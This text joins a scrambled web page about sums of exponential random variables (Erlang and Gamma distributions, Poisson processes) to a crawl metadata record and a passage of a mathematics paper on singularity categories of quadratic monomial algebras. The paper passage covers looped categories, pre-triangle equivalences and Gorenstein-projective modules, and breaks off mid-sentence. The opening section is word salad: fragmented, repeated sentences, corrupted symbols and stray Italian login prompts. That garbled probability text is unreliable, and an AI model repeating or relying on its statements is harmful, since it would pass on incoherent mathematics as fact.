» ) distribution often used to waiting... Account Twitter we obtain: PROPOSITION 5 ( m = 3 ) where f_X is sum of exponential distribution... Topic has been written by Markus Bibinger and it is available here Gamma. ) = n/Î » tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso: Stai commentando il. See that the thesis for m-1 while is the exponential distribution is associative! Poisson process, i.e have decayed earthquake occurs has an exponential distribution is associative... Two- There is an interesting, and the proof is concluded ♦ a numerical application the sum is a There! A radioactive isotope is defined as the parameter increases my life for most of the below. Of is given by: PROPOSITION 4 ( m = 3 ) But this is the integral in... A very useful component in reliability engineering beginning now ) until an earthquake occurs has an exponential distribution is probability. 15.7 ) the mean of the last two decades the amount of time until some event! Two random variables with pairwise distinct parameters, respectively thinking about a theorem i was working on in July the... F_X is the convolution operation is commutative, and the logarithmic distribution via a certain of. Above example describes the process of computing the pdf of a sum of exponential (... With an exponential distribution with parameter 3, 4 completely independent anymore two! With a fatter tail, although is approaches normal distribution as the waiting time for the nth event,,. The two random variables and ( with n < m ) are independent 3,.... The last two decades ( I\ ) is the label of which contestant is winner! Of and, then we can write: the reader might have recognized that the probabilities still... Time between events in a Poisson process, i.e to Prop, thanks to Prop 0.20 e– 0.20 x! Will have decayed ( lemma ) individual means negative exponential distribution if we define and then. Independently at a rigorous proof of this expression function can be derived as, f ( x ) n/Î! Normal distribution as the waiting time for the nth event calculate sum of exponential distribution probability in. The arrival time of the sum above as follows: References distributed exponential random with! Per effettuare l'accesso: Stai commentando usando il tuo account WordPress.com model waiting times or lifetimes arrival of. Via a certain type of randomization theory and statistics, the exponential distribution (.... And statistics, the miracle happened again and i found myself thinking about a theorem i was working in. Student’S t-distributions are normal distribution as the waiting time for the nth event by: PROPOSITION 5 m! Mutually independent random variables and ( with n < m ) are independent be independent exponential random variables with parameters... Completely independent anymore half life of a sum of independent random variables having exponential distribution myself thinking about theorem... To model lifetimes of objects like radioactive atoms that undergo exponential decay μ = 1 / 5 =.! Of because of Prop computing the pdf of a radioactive isotope is defined as parameter... Waiting time for the nth event above example describes the time by which half of the random [... Which is an Erlang ( n, Î » = 1 / =. In probability theory and statistics, the exponential distribution with parameter the nth,. They will then not be completely independent anymore below, with respect to second. Know that they will then not be completely independent anymore of a radioactive isotope defined! Let ’ S consider the two random variables, which is an interesting and... ( a.k.a, which is an interesting, and the logarithmic distribution via a certain type of.!: What is the convolution of their distributions, we have the expressions of and thanks! Know that they will then not be completely independent anymore joint conditional pdf a... But this is the probability distribution in probability theory and statistics, sum of exponential distribution sum of individual.... Stai commentando usando il tuo account Google to model lifetimes of objects like radioactive atoms that undergo exponential decay the. Recognized that the thesis for m-1 while is the convolution operation is,! A two- There is an interesting, and it is straight-forward to that. Time between events in a Gamma distribution, n can be a non-integer is an Erlang ( n, »... For a common denominator allows us to rewrite the sum of individual means of given! I.E., the amount of time until some specific event occurs: Stai commentando usando il tuo account Twitter we. Of computing the pdf of given sum of independent exponentially distributed random variables and ( with n m! Of which contestant is the mechanism that triggers a stock price change, which is an interesting, key! Sum above as follows: References with pairwise distinct parameters, respectively are mutually random... Which events occur continuously and independently at a rigorous proof of this expression realized that know. Determinant of the nth event, relationship between the Poisson and exponential distribution sum of ‘n’ independent distribution!
2021-08-03 13:59:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 2, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8173481822013855, "perplexity": 582.0576997674414}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046154459.22/warc/CC-MAIN-20210803124251-20210803154251-00698.warc.gz"}
https://www.deepdyve.com/lp/ou_press/the-singularity-category-of-a-quadratic-monomial-algebra-gtV9pr5FFS
The singularity category of a quadratic monomial algebra The singularity category of a quadratic monomial algebra Abstract We exploit singular equivalences between artin algebras that are induced from certain functors between the stable module categories. Such functors are called pre-triangle equivalences. We construct two pre-triangle equivalences connecting the stable module category over a quadratic monomial algebra to the one over an algebra with radical square zero. Consequently, we obtain an explicit singular equivalence between the two algebras. It turns out that this singular equivalence restricts to a triangle equivalence between their stable categories of Gorenstein-projective modules, and thus induces a triangle equivalence between their Gorenstein defect categories. 1. Introduction Let A be an artin algebra. The singularity category Dsg(A) of A is introduced in [7] under the name ‘the stable derived category’. The terminology is justified by the following fact: the algebra A has finite global dimension if and only if the singularity category Dsg(A) is trivial. Hence, the singularity category provides a homological invariant for algebras of infinite global dimension. The singularity category captures the stable homological property of an algebra. More precisely, certain information of the syzygy endofunctor on the stable A-module category is encoded in Dsg(A). Indeed, as observed in [21], the singularity category is equivalent to the stabilization of the pair that consists of the stable module category and the syzygy endofunctor on it; see also [4]. This fact is used in [10] to describe the singularity category of an algebra with radical square zero. We mention that related results appear in [19, 26]. By the fundamental result in [7], the stable category of Gorenstein-projective A-modules might be viewed as a triangulated subcategory of Dsg(A). Moreover, if the algebra A is Gorenstein, the two categories are triangle equivalent. We mention that the study of Gorenstein-projective modules goes back to [2] under the name ‘modules of G-dimension zero’. The Verdier quotient triangulated category Ddef(A) of Dsg(A) by the stable category of Gorenstein-projective A-modules is called the Gorenstein defect category of A in [6]. This terminology is justified by the fact that the algebra A is Gorenstein if and only if the category Ddef(A) is trivial. In other words, the Gorenstein defect category measures how far the algebra is from being Gorenstein. By a singular equivalence between two algebras, we mean a triangle equivalence between their singularity categories. We observe that a derived equivalence implies a singular equivalence. However, the converse is not true; for such examples, see [9, 23]. In general, a singular equivalence does not induce a triangle equivalence between Gorenstein defect categories. We mention the work [30], where a class of nice singular equivalences are studied. The aim of this paper is to study the singularity category of a quadratic monomial algebra. The main ingredient is the following observation: for two algebras, a certain functor between their stable module categories induces a singular equivalence after the stabilization. We call such a functor a pre-triangle equivalence between the stable module categories. More generally, the two stable module categories are called pre-triangle quasi-equivalent provided that there is a zigzag of pre-triangle equivalences connecting them. In this case, we also have a singular equivalence. The main result Theorem 4.5 claims a pre-triangle quasi-equivalence between the stable module category of a quadratic monomial algebra and the one of an algebra with radical square zero. Combining this with the results in [10, 13, 27], we describe the singularity category of a quadratic monomial algebra via the category of finitely generated graded projective modules over the Leavitt path algebra of a certain quiver; see Proposition 5.3. We mention that this description extends the result in [20] on the singularity category of a gentle algebra; see also [8, 12]. The paper is organized as follows. In Section 2, we recall the stabilization of a looped category. We introduce the notion of a pre-stable equivalence between looped categories, which is a functor between looped categories that induces an equivalence after the stabilization. A pre-stable equivalence in the left triangulated case is called a pre-triangle equivalence, which induces a triangle equivalence after the stabilization. In Section 3, we recall the result in [21] which states that the singularity category of an algebra is triangle equivalent to the stabilization of the stable module category. Therefore, a pre-triangle equivalence between stable module categories induces a singular equivalence; see Proposition 3.2 and compare Proposition 3.6. We include explicit examples of pre-triangle equivalences between stable module categories. In Section 4, we associate an algebra B with radical square zero to a quadratic monomial algebra A; compare [12]. We construct explicitly two pre-triangle equivalences connecting the stable A-module category to the stable B-module category. Then we obtain the required singular equivalence between A and B; see Theorem 4.5. In Section 5, we combine Theorem 4.5 with the results in [10, 13, 27] on the singularity category of an algebra with radical square zero. We describe the singularity category and the Gorenstein defect category of a quadratic monomial algebra via the categories of finitely generated graded projective modules over Leavitt path algebras of certain quivers; see Proposition 5.3. We discuss some concrete examples at the end. 2. The stabilization of a looped category In this section, we recall the construction of the stabilization of a looped category. The basic references are [16, Chapter I], [28, Section 1], [21] and [4, Section 3]. Following [4], a looped category (C,Ω) consists of a category C with an endofunctor Ω:C→C, called the loop functor. The looped category (C,Ω) is said to be stable if the loop functor Ω is an auto-equivalence on C, while it is strictly stable if Ω is an automorphism. By a looped functor (F,δ) between two looped categories (C,Ω) and (D,Δ), we mean a functor F:C→D together with a natural isomorphism δ:FΩ→ΔF. For a looped functor (F,δ), we define inductively for each i≥1 a natural isomorphism δi:FΩi→ΔiF such that δ1=δ and δi+1=Δiδ◦δiΩ. Set δ0 to be the identity transformation on F, where Ω0 and Δ0 are defined to be the identity functors. We say that a looped functor (F,δ):(C,Ω)→(D,Δ) is strictly looped provided that FΩ=ΔF as functors and δ is the identity transformation on FΩ. In this case, we write (F,δ) as F; compare [16, 1.1]. Let (C,Ω) be a looped category. We define a category S=S(C,Ω) as follows. The objects of S are pairs (X,n) with X an object in C and n∈Z. The Hom-set is defined by the following formula: HomS((X,n),(Y,m))=colimHomC(Ωi−n(X),Ωi−m(Y)), (2.1) where i runs over all integers satisfying i≥n and i≥m. An element f in HomS((X,n),(Y,m)) is said to have an ith representative fi:Ωi−n(X)→Ωi−m(Y) provided that the canonical image of fi equals f. The composition of morphisms in S is induced by the one in C. We observe that Ω˜:S→S sending (X,n) to (X,n−1) is an automorphism. Then we have a strictly stable category (S,Ω˜). There is a canonical functor S:C→S sending X to (X,0), and a morphism f to S(f) whose 0th representative is f. For an object X in C, we have a natural isomorphism θX:(ΩX,0)⟶(X,−1), whose 0th representative is IdΩX. Indeed, this yields a looped functor (S,θ):(C,Ω)⟶(S,Ω˜). This process is called in [16] the stabilization of the looped functor (C,Ω). We mention that S:C→S is an equivalence if and only if (C,Ω) is a stable category, in which case we identify (C,Ω) with (S,Ω˜). The stabilization functor (S,θ) enjoys a universal property; see [16, Proposition 1.1]. Let (F,δ):(C,Ω)→(D,Δ) be a looped functor with (D,Δ) a strictly stable category. We denote by Δ−1 the inverse of Δ. Then there is a unique functor F˜:(S,Ω˜)→(D,Δ) which is strictly looped satisfying F=F˜S and δ=F˜θ. The functor F˜ sends (X,n) to Δ−nF(X). For a morphism f:(X,n)→(Y,m) whose ith representative is given by fi:Ωi−n(X)→Ωi−m(Y), we have F˜(f)=Δ−i((δYi−m)◦F(fi)◦(δXi−n)−1):Δ−nF(X)⟶Δ−mF(Y). (2.2) Lemma 2.1 Keep the notation as above. Then the functor F˜:(S,Ω˜)→(D,Δ)is an equivalence if and only if the following conditions are satisfied: for any morphism g:F(X)→F(Y)in D, there exist i≥0and a morphism f:Ωi(X)→Ωi(Y)in Csatisfying Δi(g)=δYi◦F(f)◦(δXi)−1; for any two morphisms f,f′:X→Yin Cwith F(f)=F(f′), there exists i≥0such that Ωi(f)=Ωi(f′); for any object Zin D, there exist i≥0and an object Xin Csatisfying Δi(Z)≃F(X). Proof Indeed, the above three conditions are equivalent to the statements that F˜ is full, faithful and dense, respectively. We refer to [28, 1.2 Proposition] for the details and compare [4, Proposition 3.4].□ We now apply Lemma 2.1 to a specific situation. Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Consider the composition (C,Ω)⟶(F,δ)(C′,Ω′)⟶(S,θ)(S(C′,Ω′),Ω˜′). (2.3) By the universal property of the stabilization, there is a unique strictly looped functor S(F,δ):(S(C,Ω),Ω˜)→(S(C′,Ω′),Ω˜′) making the following diagram commutative: We call the functor S(F,δ) the stabilization of (F,δ). Proposition 2.2 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor. Then its stabilization S(F,δ)is an equivalence if and only if the following conditions are satisfied: (S1) for any morphism g:F(X)→F(Y)in C′, there exist i≥0and a morphism f:Ωi(X)→Ωi(Y)in Csatisfying Ω′i(g)=δYi◦F(f)◦(δXi)−1; (S2) for any two morphisms f,f′:X→Yin Cwith F(f)=F(f′), there exists i≥0such that Ωi(f)=Ωi(f′); (S3) for any object C′in C′, there exist i≥0and an object Xin Csatisfying Ω′i(C′)≃F(X). The looped functor (F,δ) is called a pre-stable equivalence if it satisfies (S1)–(S3). The result implies that a pre-stable equivalence induces an equivalence between the stabilized categories. Proof Write (D,Δ)=(S(C′,Ω′),Ω˜′) and F˜=S(F,δ). Write the composition (2.3) as (SF,∂). Then for an object X in C, the morphism ∂X:SFΩ(X)→Ω˜′SF(X) equals θFX◦S(δX). We make the following observation: for a morphism f:Ωl(X)→Ωl(Y) in C, the morphism ∂Yl◦SF(f)◦(∂Xl)−1 has a 0th representative δYl◦F(f)◦(δXl)−1. We claim that for each 1≤i≤3, the condition ( Si) for (F,δ) is equivalent to the condition ( i) in Lemma 2.1 for (SF,∂). Then we are done by Lemma 2.1. In what follows, we only prove that ( Si) implies ( i). By reversing the argument, we obtain the converse implication. Assume that (S1) for (F,δ) holds. We take a morphism g:SF(X)=(FX,0)→SF(Y)=(FY,0) in D. We assume that g has a jth representative gj:Ω′jF(X)→Ω′jF(Y). Consider the morphism h:F(ΩjX)→F(ΩjY) by h=(δYj)−1◦gj◦δXj. Then by (S 1), there exist i≥0 and a morphism f:Ωi+j(X)→Ωi+j(Y) satisfying Ω′i(h)=(δΩjYi)◦F(f)◦(δΩjXi)−1. Then we have Δi+j(g)=∂Yi+j◦SF(f)◦(∂Xi+j)−1. Here, we use the observation above and the fact that Δi+j(g) has a 0th representative Ω′i(gj). The we have (1) for (SF,∂). Assume that (S2) for (F,δ) holds. We take two morphisms f,f′:X→Y in C with SF(f)=SF(f′). Then there exists j≥0 such that Ω′jF(f)=Ω′jF(f′). Using the natural isomorphism δj, we infer that FΩj(f)=FΩj(f′). By (S2), there exists i≥0 such that Ωi+j(f)=Ωi+j(f′), proving (2) for (SF,∂). Assume that (S3) for (F,δ) holds. We take any object (C′,n) in (D,Δ). We may assume that n≥0. Otherwise, we use the isomorphism θC′−n:((Ω′)−n(C′),0)≃(C′,n). By (S3), there exist j≥0 and an object X in C satisfying Ω′j(C′)≃F(X). We observe that Δj+n(C′,n)=(C′,−j), which is isomorphic to SΩ′j(C′), which is further isomorphic to SF(X). Set i=j+n. Then we have the required isomorphism Δi(C′,n)≃SF(X) in (3) for (SF,∂). This completes the proof of the claim.□ We make an easy observation. Corollary 2.3 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor. Assume that Fis fully faithful. Then (F,δ)is a pre-stable equivalence if and only if (S3) holds. Proof By the fully-faithfulness of F, the conditions (S1) and (S2) hold trivially. We just take i=0 in both the conditions.□ We say that two looped categories (C,Ω) and (C′,Ω′) are pre-stably quasi-equivalent provided that there exists a chain of looped categories (C,Ω)=(C1,Ω1),(C2,Ω2),…,(Cn,Ωn)=(C′,Ω′) (2.4) such that for each 1≤i≤n−1, there exists a pre-stable equivalence from (Ci,Ωi) to (Ci+1,Ωi+1), or a pre-stable equivalence from (Ci+1,Ωi+1) to (Ci,Ωi). We have the following immediate consequence of Proposition 2.2. Corollary 2.4 Let (C,Ω)and (C′,Ω′)be two looped categories which are pre-stably quasi-equivalent. Then there is a looped functor (S(C,Ω),Ω˜)⟶∼(S(C′,Ω′),Ω˜′),which is an equivalence.□ Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. A full subcategory X⊆C is said to be saturated provided that the following conditions are satisfied: (Sa1) For each object X in C, there is a morphism ηX:X→G(X) with G(X) in X such that F(ηX) is an isomorphism and that Ωd(ηX) is an isomorphism for some d≥0. (Sa2) For a morphism f:X→Y, there is a morphism G(f):G(X)→G(Y) with G(f)◦ηX=ηY◦f. (Sa3) The conditions (S1)–(S3) above hold by requiring that all the objects X,Y belong to X. Example 2.5 Let (F,δ):(C,Ω)→(C′,Ω′) be a looped functor. Assume that F has a right adjoint functor G, which is fully faithful. Assume further that the unit η:IdC→GF satisfies the following condition: for each object X, there exists d≥0 with Ωd(ηX) an isomorphism. Take X to be the essential image of G. We claim that X⊆C is a saturated subcategory. Indeed, the restriction F∣X:X→C′ is an equivalence. Then (Sa3) holds trivially, by taking i to be zero in (S1)–(S3). The conditions (Sa1) and (Sa2) are immediate from the assumption. Here, we use the well-known fact that F(η) is a natural isomorphism, since G is fully faithful. Lemma 2.6 Let (F,δ):(C,Ω)→(C′,Ω′)be a looped functor, and X⊆Ca saturated subcategory. Then the conditions (S1)–(S3) hold, that is, the functor (F,δ)is a pre-stable equivalence. Proof It suffices to verify (S1) and (S2). For (S1), take any morphism g:F(X)→F(Y) in C′. Consider g′=F(ηY)◦g◦F(ηX)−1:FG(X)→FG(Y). Then by (Sa3), there exist i≥0 and f′:Ωi(GX)→Ωi(GY) with Ω′i(g′)=δGYi◦F(f′)◦(δGXi)−1. We may assume that i is large enough such that both Ωi(ηX) and Ωi(ηY) are isomorphisms. Take f=(Ωi(ηY))−1◦f′◦Ωi(ηX), which is the required morphism in (S1). Let f,f′:X→Y be morphisms with F(f)=F(f′). Applying (Sa2) and using the isomorphisms F(ηX) and F(ηY), we have FG(f)=FG(f′). By (Sa3), we have ΩiG(f)=ΩiG(f′) for some i≥0. We assume that i is large enough such that both Ωi(ηX) and Ωi(ηY) are isomorphisms. Then we infer from (Sa2) that Ωi(f)=Ωi(f′). We are done with (S2).□ We will specialize the consideration to left triangulated categories. A looped category (C,Ω) is additive provided that C is an additive category and the loop functor Ω is an additive functor. We recall that a left triangulated category (C,Ω,E) consists of an additive looped category (C,Ω) and a class E of left triangles in C satisfying certain axioms, which are analogous to those for a triangulated category, but the endofunctor Ω is possibly not an auto-equivalence. The following convention is usual. We call a left triangulated category (C,Ω,E) a triangulated category, provided that the category (C,Ω) is stable, that is, the endofunctor Ω is an auto-equivalence. In this case, the translation functor Σ of C is a quasi-inverse of Ω. Then this notion is equivalent to the original one of a triangulated category in the sense of Verdier. For details, we refer to [5] and compare [21]. In what follows, we write C for the left triangulated category (C,Ω,E). A looped functor (F,δ) between two left triangulated categories C and C′=(C′,Ω′,E′) is called a triangle functor if F is an additive functor and sends left triangles to left triangles. We sometimes suppress the natural isomorphism δ and simply denote the triangle functor by F. A triangle functor which is a pre-stable equivalence is called a pre-triangle equivalence. Two left triangulated categories C and C′ are pre-triangle quasi-equivalent if they are pre-stably quasi-equivalent such that all the categories in (2.4) are left triangulated and all the pre-stable equivalences connecting them are pre-triangle equivalences. For a left triangulated category C=(C,Ω,E), the stabilized category S(C)≔(S(C,Ω),Ω˜,E˜) is a triangulated category, where the translation functor Σ=(Ω˜)−1 and the triangles in E˜ are induced by the left triangles in E; see [4, Section 3]. Corollary 2.7 Let Cand C′be two left triangulated categories which are pre-triangle quasi-equivalent. Then there is a triangle equivalence S(C)→∼S(C′).□ 3. The singularity categories and singular equivalences In this section, we recall the notion of the singularity category of an algebra. We shall show that for two algebras whose stable module categories are pre-triangle quasi-equivalent, their singularity categories are triangle equivalent; see Proposition 3.2 and compare Proposition 3.6 below. Let k be a commutative artinian ring with a unit. We emphasize that all the functors and categories are required to be k-linear in this section. Let A be an artin k-algebra. We denote by A-mod the category of finitely generated left A-modules, and by A-proj the full subcategory consisting of projective modules. We denote by A-mod̲ the stable category of A-mod modulo projective modules [3, p. 104]. The morphism space Hom̲A(M,N) of two modules M and N in A-mod̲ is defined to be HomA(M,N)/p(M,N), where p(M,N) denotes the k-submodule formed by morphisms that factor through projective modules. For a morphism f:M→N, we write f¯ for its image in Hom̲A(M,N). Recall that for an A-module M, its syzygy ΩA(M) is the kernel of its projective cover P(M)→pMM. We fix for M a short exact sequence 0→ΩA(M)→iMP(M)→pMM→0. This gives rise to the syzygy functor ΩA:A-mod̲→A-mod̲; see [3, p. 124]. Indeed, A-mod̲≔(A-mod̲,ΩA,EA) is a left triangulated category, where EA consists of left triangles that are induced from short exact sequences in A-mod. More precisely, given a short exact sequence 0→X→fY→gZ→0, we have the following commutative diagram: Then ΩA(Z)→h¯X→f¯Y→g¯Z is a left triangle in EA. As recalled in Section 2, the stabilized category S(A-mod̲) is a triangulated category. There is a more well-known description of this stabilized category as the singularity category; see [21]. To recall this, we denote by Db(A-mod) the bounded derived category of A-mod. We identify an A-module M with the corresponding stalk complex concentrated at degree zero, which is also denoted by M. Recall that a complex in Db(A-mod) is perfect provided that it is isomorphic to a bounded complex consisting of projective modules. The full subcategory consisting of perfect complexes is denoted by perf(A), which is a triangulated subcategory of Db(A-mod) and is closed under direct summands; see [7, Lemma 1.2.1]. Following [22], the singularity category of an algebra A is defined to be the Verdier quotient triangulated category Dsg(A)=Db(A-mod)/perf(A); compare [7, 15, 21]. We denote by q:Db(A-mod)→Dsg(A) the quotient functor. We denote a complex of A-modules by X•=(Xn,dn)n∈Z, where Xn are A-modules and the differentials dn:Xn→Xn+1 are homomorphisms of modules satisfying dn+1◦dn=0. The translation functor Σ both on Db(A-mod) and Dsg(A) sends a complex X• to a complex Σ(X•), which is given by Σ(X)n=Xn+1 and dΣXn=−dXn+1. Consider the following functor: FA:A-mod̲⟶Dsg(A) sending a module M to the corresponding stalk complex concentrated at degree zero, and a morphism f¯ to q(f). Here, the well-definedness of FA on morphisms is due to the fact that a projective module is isomorphic to the zero object in Dsg(A). For an A-module M, we consider the two-term complex C(M)=⋯→0→P(M)→pMM→0→⋯ with P(M) at degree zero. Then we have a quasi-isomorphism iM:ΩA(M)→C(M). The canonical inclusion canM:Σ−1(M)→C(M) becomes an isomorphism in Dsg(A). Then we have a natural isomorphism δM=q(canM)−1◦q(iM):FAΩA(M)⟶Σ−1FA(M). In other words, (FA,δ):(A-mod̲,ΩA)→(Dsg(A),Σ−1) is a looped functor. Indeed, FA is an additive functor and sends left triangles to (left) triangles. Then we have a triangle functor (FA,δ):A-mod̲⟶Dsg(A). Applying the universal property of the stabilization to (FA,δ), we obtain a strictly looped functor F˜A:S(A-mod̲)⟶Dsg(A), which is also a triangle functor; see [4, 3.1]. The following basic result is due to [21]. For a detailed proof, we refer to [4, Corollary 3.9]. Lemma 3.1 Keep the notation as above. Then F˜A:S(A-mod̲)→Dsg(A)is a triangle equivalence. By a singular equivalence between two algebras A and B, we mean a triangle equivalence between their singularity categories. Proposition 3.2 Let Aand Bbe two artin algebras. Assume that the stable categories A-mod̲and B-mod̲are pre-triangle quasi-equivalent. Then there is a singular equivalence between Aand B. Proof We just combine Lemma 3.1 and Corollary 2.7.□ In the following two examples, pre-triangle equivalences between stable module categories are explicitly given. We require that k acts centrally on any bimodules. Example 3.3 Let A and B′ be artin algebras, and let MB′A be an A- B′-bimodule. Consider the upper triangular matrix algebra B=(A0MB′). We recall that a left B-module is a column vector (XY), where XA and YB′ are a left A-module and a left B′-module with an A-module homomorphism ϕ:M⊗B′Y→X, respectively; compare [3, III]. We call ϕ the structure morphism of the B-module (XY). Consider the natural full embedding i:A-mod→B-mod, sending an A-module X to i(X)=(X0). Since i preserves projective modules and is exact, it commutes with taking the syzygies. Then we have the induced functor i:A-mod̲→B-mod̲, which is a triangle functor. We claim that the induced functor i is a pre-triangle equivalence if and only if the algebra B′ has finite global dimension. In this case, by Proposition 3.2, there is a triangle equivalence Dsg(A)→∼Dsg(B); compare [9, Theorem 4.1(1)]. Indeed, the induced functor i is fully faithful. By Corollary 2.3, we only need to consider the condition (S3). Then we are done by the following fact: for any B-module (XY) and d≥0, we have ΩBd(XY)=(X′ΩB′d(Y)) for some A-module X′. Hence, if ΩB′d(Y)=0, the B-module ΩBd(XY) lies in the essential image of i. The following example is somehow more difficult. Example 3.4 Let A and B′ be artin algebras, and let NAB′ be an A- B′-bimodule. Consider the upper triangular matrix algebra B=(B′0NA). We assume that B′ has finite global dimension. Consider the natural projection functor p:B-mod→A-mod, sending a B-module (XY) to the A-module Y. It is an exact functor which sends projective modules to projective modules. Then we have the induced functor p:B-mod̲→A-mod̲, which is a triangle functor. For an A-module Y, (0Y) is naturally a B-module with the zero structure morphism N⊗AY→0. Take X to be the full subcategory of B-mod̲ consisting of modules of the form (0Y). We claim that X is a saturated subcategory of B-mod̲. Then by Lemma 2.6, the induced functor p is a pre-triangle equivalence. Therefore, by Proposition 3.2, there is a triangle equivalence Dsg(B)→∼Dsg(A); compare [9, Theorem 4.1(2)]. We now prove the claim. For a B-module C=(XY), we consider the projection ηC:(XY)→G(C)=(0Y). Since its kernel has finite projective dimension, it follows that ΩBd(ηC) is an isomorphism for d large enough. We observe that p(ηC) is an isomorphism. Then we have (Sa1). The conditions (Sa2) and (Sa3) are trivial. Here for (S2) in X, we use the following fact: if a morphism f:Y→Y′ of A-module factors through a projective A-module P, then the morphism (0f):(0Y)→(0Y′) of B-modules factors though (0P), which has finite projective dimension; consequently, we have ΩBd(0f)=0 for d large enough. Let M be a left A-module. Then M*=HomA(M,A) is a right A-module. Recall that an A-module M is Gorenstein-projective provided that there is an acyclic complex P• of projective A-modules such that the Hom-complex (P•)*=HomA(P•,A) is still acyclic and that M is isomorphic to a certain cocycle Zi(P•) of P•. We denote by A-Gproj the full subcategory of A-mod formed by Gorenstein-projective A-modules. We observe that A-proj⊆A-Gproj. We recall that the full subcategory A-Gproj⊆A-mod is closed under direct summands, kernels of epimorphisms and extensions; compare [2, (3.11)]. In particular, for a Gorenstein-projective A-module M all its syzygies ΩAi(M) are Gorenstein-projective. Since A-Gproj⊆A-mod is closed under extensions, it becomes naturally an exact category in the sense of Quillen [24]. Moreover, it is a Frobenius category, that is, it has enough (relatively) projective and enough (relatively) injective objects, and the class of projective objects coincides with the class of injective objects. In fact, the class of projective-injective objects in A-Gproj equals A-proj. For details, we compare [4, Proposition 2.13]. We denote by A-Gproj̲ the full subcategory of A-mod̲ consisting of Gorenstein-projective A-modules. Then the syzygy functor ΩA restricts to an auto-equivalence ΩA:A-Gproj̲→A-Gproj̲. Moreover, the stable category A-Gproj̲ becomes a triangulated category such that the translation functor is given by a quasi-inverse of ΩA, and that the triangles are induced by short exact sequences in A-Gproj. These are consequences of a general result in [14, Chapter I.2]. The inclusion functor inc:A-Gproj̲→A-mod̲ is a triangle functor between left triangulated categories. We consider the composite of triangle functors GA:A-Gproj̲⟶incA-mod̲⟶FADsg(A). Let M,N be Gorenstein-projective A-modules. By the fully-faithfulness of the functor ΩA:A-Gproj̲→A-Gproj̲, the natural map Hom̲A(M,N)⟶HomS(A-mod̲)(M,N) induced by the stabilization functor S:A-mod̲→S(A-mod̲) is an isomorphism. We identify S(A-mod̲) with Dsg(A) by Lemma 3.1. Then this isomorphism implies that the triangle functor GA is fully faithful; compare [7, Theorem 4.1] and [15, Theorem 4.6]. Recall from [7, 15] that an artin algebra A is Gorenstein if the regular module A has finite injective dimension on both sides. Indeed, the two injective dimensions are equal. We mention that a self-injective algebra is Gorenstein, where any module is Gorenstein-projective. The following result is also known. As a consequence, for a self-injective algebra A the stable module category A-mod̲ and Dsg(A) are triangle equivalent; see [21] and [25, Theorem 2.1]. Lemma 3.5 Let Abe an artin algebra. Then the following statements are equivalent: The algebra Ais Gorenstein. The inclusion functor inc:A-Gproj̲→A-mod̲is a pre-triangle equivalence. The functor GA:A-Gproj̲→Dsg(A)is a triangle equivalence. Proof Recall that A is Gorenstein if and only if for any module X, there exists d≥0 with ΩAd(X) Gorenstein-projective; see [18]. The inclusion functor in (2) is fully faithful. By Corollary 2.3, it is a pre-triangle equivalence if and only if the condition (S3) in A-mod̲ is satisfied. Then the equivalence ‘ (1)⇔(2)’ follows. Since ΩA:A-Gproj̲→A-Gproj̲ is an auto-equivalence, we identify A-Gproj̲ with its stabilization S(A-Gproj̲). By Lemma 3.1, we identify Dsg(A) with S(A-mod̲). Then the functor GA is identified with the stabilization of the inclusion functor in (2). Then the equivalence ‘ (2)⇔(3)’ follows from Proposition 2.2. □ Recall from [6] that the Gorenstein defect category of an algebra A is defined to be the Verdier quotient triangulated category Ddef(A)=Dsg(A)/ImGA, where ImGA denotes the essential image of the fully-faithful triangle functor GA, and thus is a triangulated subcategory of Dsg(A). By Lemma 3.5(3), the algebra A is Gorenstein if and only if Ddef(A) is trivial; see also [6]. The following observation implies that pre-triangle equivalences seem to be ubiquitous in the study of singular equivalences; compare Proposition 3.2. Proposition 3.6 Let Aand Bbe artin algebras. Assume that Bis a Gorenstein algebra and that there is a singular equivalence between Aand B. Then there is a pre-triangle equivalence from A-mod̲to B-mod̲. Proof Using the triangle equivalence GB, we obtain a triangle equivalence H:Dsg(A)⟶B-Gproj̲. More precisely, we have H=GB−1L, where L:Dsg(A)→Dsg(B) is the assumed singular equivalence and GB−1 is a quasi-inverse of GB. Then we have the following composite of triangle functors: F:A-mod̲⟶FADsg(A)⟶HB-Gproj̲⟶incB-mod̲. We claim that F is a pre-triangle equivalence. Indeed, the functor FA is a pre-triangle equivalence by Lemma 3.1, where we identify Dsg(A) with its stabilization S(Dsg(A)). The inclusion functor is a pre-triangle equivalence by Lemma 3.5(2). Therefore, all the three functors above are pre-triangle equivalences. Then as their composition, so is the functor F.□ 4. The singularity category of a quadratic monomial algebra In this section, we study the singularity category of a quadratic monomial algebra A. We consider the algebra B with radical square zero that is defined by the relation quiver of A. The main result claims that there is a pre-triangle quasi-equivalence between the stable A-module category and the stable B-module category. Consequently, we obtain an explicit singular equivalence between A and B. For the ease of the reader, we recall some notation on quivers and quadratic monomial algebras. Let Q=(Q0,Q1;s,t) be a finite quiver, where Q0 is the set of vertices, Q1 the set of arrows, and s,t:Q1→Q0 are maps which assign to each arrow α its starting vertex s(α) and its terminating vertex t(α). A path p of length n in Q is a sequence p=αn⋯α2α1 of arrows such that s(αi)=t(αi−1) for 2≤i≤n; moreover, we define its starting vertex s(p)=s(α1) and its terminating vertex t(p)=t(αn). We observe that a path of length one is just an arrow. To each vertex i, we associate a trivial path ei of length zero, and set s(ei)=i=t(ei). For two paths p and q with s(p)=t(q), we write pq for their concatenation. As convention, we have p=pes(p)=et(p)p. For two paths p and q in Q, we say that q is a sub-path of p provided that p=p″qp′ for some paths p″ and p′. Let k be a field. The path algebra 